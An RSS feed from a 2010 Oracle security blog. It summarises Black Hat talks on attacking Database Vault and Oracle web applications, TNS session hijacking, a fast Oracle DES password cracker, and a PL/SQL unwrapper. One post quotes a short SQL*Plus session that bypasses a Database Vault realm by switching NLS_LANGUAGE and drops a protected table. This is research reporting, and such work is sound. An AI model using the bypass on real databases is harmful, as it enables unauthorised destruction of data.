<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.2.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>Alexander Kornbrust Oracle Security Blog</title>
	<link>http://blog.red-database-security.com</link>
	<description>Oracle Security</description>
	<pubDate>Thu, 05 Aug 2010 15:34:19 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.1</generator>
	<language>en</language>
			<item>
		<title>Oracle Presentations from Blackhat 2010 Las Vegas are online</title>
		<link>http://blog.red-database-security.com/2010/08/05/oracle-presentations-from-blackhat-2010-las-vegas-are-online/</link>
		<comments>http://blog.red-database-security.com/2010/08/05/oracle-presentations-from-blackhat-2010-las-vegas-are-online/#comments</comments>
		<pubDate>Thu, 05 Aug 2010 15:26:46 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2010/08/05/oracle-presentations-from-blackhat-2010-las-vegas-are-online/</guid>
		<description><![CDATA[After a longer break here a blog entry again:The presentations and documents from Blackhat 2010 Las Vegas are online.
This year 2 presentations from Esteban and Sid were dedicated to Oracle:
Hacking and protecting Oracle Database Vault - Esteban Fayo
Esteban describes different attacks against Oracle Database Vault.
These well-known techniques are
* With OS access
* Creating and executing a procedure in [...]]]></description>
			<content:encoded><![CDATA[<p>After a longer break here a blog entry again:The presentations and documents from Blackhat 2010 Las Vegas are online.</p>
<p>This year 2 presentations from Esteban and Sid were dedicated to Oracle:</p>
<p><strong>Hacking and protecting Oracle Database Vault - Esteban Fayo</strong></p>
<p>Esteban describes different attacks against Oracle Database Vault.</p>
<p>These well-known techniques are</p>
<p>* With OS access</p>
<p>* Creating and executing a procedure in MACSYS schema</p>
<p>* SYS user can bypass DB Vault</p>
<p>* Impersonating SYS using SQL Injection</p>
<p>* Exploiting other vulnerabilities specific to DB Vault.</p>
<p>Keep in mind that Esteban decribes only a subset of possible attacks. There are for example  other possibilities to execute OS commands or impersonate other users available.</p>
<p>My favorite exploit from this presentation to bypass (older versions of) database vault is the following one:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p><em>SQL&gt; connect onedba/onedba Connected. </em></p>
<p><em>SQL&gt; drop table hr.jobs cascade constraints; </em><em>  </em></p>
<p><em>drop table hr.jobs cascade constraints </em><em>  </em></p>
<p><em>* ERROR at line 1: </em><em>  </em></p>
<p><em>ORA-00604: error occurred at recursive SQL level 1 </em><em>  </em></p>
<p><em>ORA-47401: Realm violation for drop table on HR.JOBS </em><em>  </em></p>
<p><em>ORA-06512: at &#8220;DVSYS.AUTHORIZE_EVENT&#8221;, line 55 </em><em> </em></p>
<p><em> ORA-06512: at line 13</em><em> </em><em>&#8211; Switch to a different NLS_LANGUAGE </em></p>
<p><em>SQL&gt; alter session set NLS_LANGUAGE=&#8221;LATIN AMERICAN SPANISH&#8221;; </em></p>
<p><em>Session altered. </em></p>
<p><em>SQL&gt; drop table hr.jobs cascade constraints; </em></p>
<p><em>Table dropped. </em></p>
<p style="font: 18px Tahoma; margin: 0px"><span style="font-family: Georgia,'Times New Roman',Times,serif; font-size: 16px; line-height: 20px" class="Apple-style-span">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</span></p>
<p style="font: 18px Tahoma; margin: 0px">&nbsp;</p>
<p>It seems that some developers still not realized that there are other countries/languages outside of the US&#8230;.</p>
<p style="font: 18px Tahoma; margin: 0px">&nbsp;</p>
<p style="font: 18px Tahoma; margin: 0px"><span style="font-family: Georgia,'Times New Roman',Times,serif; font-size: 16px; line-height: 20px" class="Apple-style-span">Here are the links from the Blackhat page (<a href="https://media.blackhat.com/bh-us-10/whitepapers/Fayo/BlackHat-USA-2010-Fayo-Hacking-Protecting-Oracle-Databease-Vault-wp.pdf" title="DB Vault whitepaper">whitepaper</a>, <a href="https://media.blackhat.com/bh-us-10/presentations/Fayo/BlackHat-USA-2010-Fayo-Hacking-Protecting-Oracle-Databease-Vault-slides.pdf" title="DB Vault presentation">presentation</a>, <a href="https://media.blackhat.com/bh-us-10/whitepapers/Fayo/BlackHat-USA-2010-Fayo-Hacking-Protecting-Oracle-Databease-Vault-wp.pdf" title="DB Vault scripts">scripts</a>) .</span></p>
<p style="font: 18px Tahoma; margin: 0px">&nbsp;</p>
<p><a href="http://www.notsosecure.com/folder2/2010/08/02/blackhat-2010/" title="Hacking Oracle from the web"><strong>Hacking Oracle from the Web</strong></a><strong> - Sumit Siddarth (Sid)</strong></p>
<p>Great summary with different possibilities (Privilege escalation, OS execution, &#8230;) how to exploit Oracle from vulnerable web apps.</p>
<p>Really good and useful collection of information. Sid&#8217;s blog contains also some nice videos.</p>
<p>Here is the link from the Blackhat page (<a href="https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf" title="Hacking Oracle from the web (presentation)">whitepaper</a>) .</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2010/08/05/oracle-presentations-from-blackhat-2010-las-vegas-are-online/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Blackhat 2010 Presentation &#8220;Oracle, Interrupted: Stealing Sessions and Credentials&#8221; online</title>
		<link>http://blog.red-database-security.com/2010/04/18/blackhat-2010-presentation-oracle-interrupted-stealing-sessions-and-credentials-online/</link>
		<comments>http://blog.red-database-security.com/2010/04/18/blackhat-2010-presentation-oracle-interrupted-stealing-sessions-and-credentials-online/#comments</comments>
		<pubDate>Sun, 18 Apr 2010 14:44:27 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Tools]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2010/04/18/blackhat-2010-presentation-oracle-interrupted-stealing-sessions-and-credentials-online/</guid>
		<description><![CDATA[ The Blackhat Europe 2010 &#8220;Oracle, Interrupted: Stealing Sessions and Credentials&#8221; (presentation, whitepaper) of Steve Ocepek and Wendel G. Henrique are online. An interview with Steve about the talk can be found here.
As mentioned in a previous blog post this talk  shows how to intercept unencrypted (=default) TNS connections and inject statements into a running session. [...]]]></description>
			<content:encoded><![CDATA[<p> The Blackhat Europe 2010 &#8220;Oracle, Interrupted: Stealing Sessions and Credentials&#8221; (<a href="https://media.blackhat.com/bh-eu-10/presentations/Henrique_Ocepek/BlackHat-EU-2010-Henrique-Ocepek-Oracle-Interrupted-slides.pdf" title="Oracle Interrupted Presentation" target="_blank">presentation</a>, <a href="https://media.blackhat.com/bh-eu-10/whitepapers/Henrique_Ocepek/BlackHat-EU-2010-Henrique-Ocepek-Oracle-Interrupted-wp.pdf" title="Blackhat 2010 Presentation "Oracle, Interrupted: Stealing Sessions and Credentials" online" target="_blank">whitepaper</a>) of Steve Ocepek and Wendel G. Henrique are online. An interview with Steve about the talk can be found <a href="http://netsecpodcast.com/?p=264" title="Interview Steve Ocepek">here</a>.</p>
<p>As mentioned in a <a href="http://blog.red-database-security.com/2010/04/12/man-in-the-middle-attacks-at-upcoming-black-hat-europe/" title="Man-in-the-Middle attacks at upcoming Black Hat Europe">previous blog post</a> this talk  shows how to intercept unencrypted (=default) TNS connections and inject statements into a running session. Steve and Wendel will soon release 2 tools Vamp and thicknet.</p>
<p>I will try to present these tools at the <a href="http://www.red-database-security.com/doag_expertenseminar.html">DOAG Expertenseminar</a> in Berlin.</p>
<p><a href="http://www.red-database-security.com/doag_expertenseminar.html" title="DOAG Expertenseminar “Oracle Hardening &amp; Patching / Auditing  &amp; Co.” " target="_blank"><img src="http://red-database-security.com/pictures/doag_expertenseminar.png" title="DOAG Expertenseminar" alt="DOAG Expertenseminar" height="53" width="365" /></a></p>
<p>A <a href="http://www.corelan.be:8800/index.php/2010/04/16/blackhat-europe-2010-barcelona-day-10/" title="Presentation Summary">good summary</a> of the talk can be found at Peter Van Eeckhoutten&#8217;s blog.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2010/04/18/blackhat-2010-presentation-oracle-interrupted-stealing-sessions-and-credentials-online/feed/</wfw:commentRss>
		</item>
		<item>
		<title>New fast Oracle DES password cracker OPS_SSE2</title>
		<link>http://blog.red-database-security.com/2010/04/15/new-fast-oracle-des-password-cracker-ops_sse2/</link>
		<comments>http://blog.red-database-security.com/2010/04/15/new-fast-oracle-des-password-cracker-ops_sse2/#comments</comments>
		<pubDate>Thu, 15 Apr 2010 21:04:32 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Tools]]></category>

		<category><![CDATA[passwords]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2010/04/15/new-fast-oracle-des-password-cracker-ops_sse2/</guid>
		<description><![CDATA[Dennis Yurichev has released a new password cracker (brute-force) called ops_sse2 for Oracle DES passwords.  This password cracker is the fastest brute force cracker for Oracle DES passwords and approx. 3 times faster than woraauthbf from Laszlo Toth.
Here a quick comparision on my Quad2Core (2.4 GHz):

Password length (8 character) (only characters) can be cracked  in [...]]]></description>
			<content:encoded><![CDATA[<p>Dennis Yurichev has released a new password cracker (brute-force) called <a href="http://conus.info/utils/" title="Oracle Password Cracker">ops_sse2</a> for Oracle DES passwords.  This password cracker is the fastest brute force cracker for Oracle DES passwords and approx. 3 times faster than <a href="http://www.soonerorlater.hu/index.khtml?article_id=513" title="woraauthbf">woraauthbf</a> from Laszlo Toth.</p>
<p>Here a quick comparision on my Quad2Core (2.4 GHz):</p>
<p><img src="http://www.red-database-security.com/pictures/ops_sse2.png" title="OPS_SSE2" alt="OPS_SSE2" width="677" height="378" /></p>
<p>Password length (8 character) (only characters) can be cracked  in approx 3 hours. For numbers and characters it takes approx. 2.5 days for a single password.</p>
<p>Impressive work&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2010/04/15/new-fast-oracle-des-password-cracker-ops_sse2/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Oracle 11g R2 client trojan warning from Antivir</title>
		<link>http://blog.red-database-security.com/2010/04/14/oracle-11g-r2-client-trojan-warning-from-antivir/</link>
		<comments>http://blog.red-database-security.com/2010/04/14/oracle-11g-r2-client-trojan-warning-from-antivir/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 19:59:18 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2010/04/14/oracle-11g-r2-client-trojan-warning-from-antivir/</guid>
		<description><![CDATA[I just came across a forum entry on OTN &#8220;Possible trojan with 11gR2 Windows 32-bit client on OTN?&#8220;. It seems that some virus scanners are reporting a potential trojan in the 32bit client of Oracle 11R2.
According the Eric Maurice from the Oracle security team it is a false positive of the Avira Antivir scanner engine.
It [...]]]></description>
			<content:encoded><![CDATA[<p>I just came across a forum entry on OTN &#8220;<a href="http://forums.oracle.com/forums/thread.jspa?messageID=4232119&amp;tstart=0" title="Possible trojan with 11gR2 Windows 32-bit client on OTN? ">Possible trojan with 11gR2 Windows 32-bit client on OTN?</a>&#8220;. It seems that some virus scanners are reporting a potential trojan in the 32bit client of Oracle 11R2.</p>
<p>According the Eric Maurice from the Oracle security team it is a false positive of the Avira Antivir scanner engine.</p>
<p>It is good to know that also large software vendors are running in this problem of false positives. This can be really bad for the reputation of a software vendor.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2010/04/14/oracle-11g-r2-client-trojan-warning-from-antivir/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Python Source for PLSQL Unwrapper posted</title>
		<link>http://blog.red-database-security.com/2010/04/13/python-source-for-plsql-unwrapper-posted/</link>
		<comments>http://blog.red-database-security.com/2010/04/13/python-source-for-plsql-unwrapper-posted/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 22:24:35 +0000</pubDate>
		<dc:creator>Alexander Kornbrust</dc:creator>
		
		<category><![CDATA[Tools]]></category>

		<category><![CDATA[Oracle Security]]></category>

		<guid isPermaLink="false">http://blog.red-database-security.com/2010/04/13/python-source-for-plsql-unwrapper-posted/</guid>
		<description><![CDATA[Niels Teusink has posted a Python script to unwrap PL/SQL code (10g+ only). This python script can unwrap code on the command line.
More details are available in the blog entry of Niels.
This is a better solution than the online unwrapper.
]]></description>
			<content:encoded><![CDATA[<p>Niels Teusink has posted a <a href="http://www.teusink.net/unwrap.py" title="PL/SQL Unwrapper">Python script</a> to unwrap PL/SQL code (10g+ only). This python script can unwrap code on the command line.</p>
<p>More details are available in the <a href="http://blog.teusink.net/2010/04/unwrapping-oracle-plsql-with-unwrappy.html" title="PLSQL Unwrapper">blog entry</a> of Niels.</p>
<p>This is a better solution than the <a href="http://hz.codecheck.ch/UnwrapIt/Unwrap.jsp" title="Online PL/SQL Unwrapper">online unwrapper</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.red-database-security.com/2010/04/13/python-source-for-plsql-unwrapper-posted/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
